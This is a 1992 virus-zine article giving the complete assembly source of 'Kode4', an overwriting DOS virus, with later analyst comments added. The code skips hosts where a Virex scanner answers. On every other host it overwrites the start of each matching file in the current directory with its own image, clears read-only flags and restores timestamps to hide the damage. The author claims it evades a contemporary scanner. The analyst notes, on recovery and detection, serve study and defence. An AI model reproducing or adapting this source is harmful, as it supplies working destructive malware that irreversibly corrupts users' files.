─────────═════════>>> Article From Evolution #2 - YAM '92

Article Title: Kode 4 v1 Virus
Author: Soltan Griss


;######################################################################
;#  Name:  Kode4 version 1.0 (overwriting stage)
;#  Author:  Soltan Griss  [YAM]
;#
;#  Description: What this sucker does is very simple. It overwrites
;#               the first 46 bytes of all com files in the current
;#               directory with its own code... as of scanv93, this
;#               virus is undetectable..
;#
;#
;#  Special Thanks go out to Data Disruptor.. If it were not for you i
;#          would still be fucking lost!!!!
;#
;######################################################################

; ----------------------------------------------------------------------
; Analyst notes (16-bit DOS .COM image, MASM-style syntax).
;
; Behaviour visible in this listing:
;   * Issues INT 21h with AX=0FF0Fh and exits untouched if AX comes back
;     as 0101h (the author's comment ties this to a resident Virex check).
;   * Walks the current directory with Find First / Find Next using the
;     mask stored at `filename`.
;   * For each match: clears the read-only attribute, opens the file for
;     writing, records its timestamp, writes this program's own image
;     over the start of the file, puts the timestamp back, closes it.
;   * Prints the banner at `DATA` and terminates with INT 20h.
;
; Points relevant to triage and recovery:
;   * No read call (AH=3Fh) appears anywhere, so the overwritten bytes of
;     a target are not saved; an affected file has to be restored from a
;     backup, it cannot be repaired from the damaged copy.
;   * The timestamp is restored, so modification time does not identify
;     affected files; compare contents or hashes instead.
;   * The read-only attribute is cleared and never set again.
;   * `filename` and `DATA` both sit between `start` and `LAST`, so they
;     belong to the image that is written; the banner text is a simple
;     content indicator.
; ----------------------------------------------------------------------
seg_a           segment byte public
                assume  cs:seg_a, ds:seg_a


                org     100h                ;.COM images load at offset 100h
V_Length        equ     last-start          ;image size, computed by the assembler
KODE4           proc    far       

start           label   near            ;Check for Virex installation
          
                mov     ax,0ff0fh           ;query value for the resident check
                int     21h
                cmp     ax,0101h        ;Abort if Virex Protection
                je      done            ; present (no file is touched on this path)


                mov     ah,4Eh             ;DOS Find First
                mov     dx,offset filename ;mask is "*.c*" (see `filename`), which
                int     21h                ; matches more than just .COM files
                                    
Back:                                       ;per-file loop; entry name is read from
                                            ; the default DTA (PSP:80h + 1Eh = 9Eh)
                mov     ah,43h              ;get rid of read only
                mov     al,0                ;AX=4300h: get attributes into CX
                mov     dx,9eh              ;DS:DX -> matched file name in the DTA
                int     21h
                mov     ah,43h              ;AX=4301h: set attributes from CX
                mov     al,01
                and     cx,11111110b        ;clear bit 0 (read-only)
                int     21h                 ;attribute is not restored later
          
                mov     ax,3D01h           ;Open file for writing
                mov     dx,9Eh             ;get file name from file DTA
                int     21h                  
                                        
                mov     bx,ax               ;save handle in bx
                mov     ah,57h              ;get time date
                mov     al,0                ;AX=5700h: CX = time, DX = date
                int     21h
                
                push    cx                  ;put in stack for later
                push    dx


                mov     dx,100h            ;Start writing at 100h
                                           ;DS:DX = buffer = this program's own
                                           ; image; the file pointer is still 0
                mov     cl,v_length        ;low byte of the byte count only
                                           ;NOTE(review): CH is not loaded here, so
                                           ; CX still carries the high byte of the
                                           ; time returned above; the overwritten
                                           ; region can therefore exceed V_Length.
                                           ; Do not rely on the header's "46 bytes"
                                           ; when sizing the damage - confirm
                                           ; against an affected sample.
                mov     ah,40h             ;Write Data into the file
                int     21h                   
                                              
                                              
                pop     dx                 ;Restore old dates and times 
                pop     cx                 ; (hides the change from mtime checks)
                mov     ah,57h
                mov     al,01h             ;AX=5701h: set time/date from CX/DX
                int     21h



                mov     ah,3Eh             ;Close the file
                int     21h                   
                                               
                mov     ah,4Fh             ;Find Next file
                int     21h                    
                                                
                jnc     Back               ;carry clear = another match, loop
                mov     ah,9h              ;print the '$'-terminated banner
                mov     dx,offset DATA
                int     21h

done:           int     20h                ;Terminate Program
filename        db      "*.c*",0           ;search mask, NUL-terminated
DATA            db      " -=+ Kode4 +=-, The one and ONLY!$"  ;banner text


kode4           endp
LAST            label near                 ;end marker used by V_Length
seg_a           ends
                end     start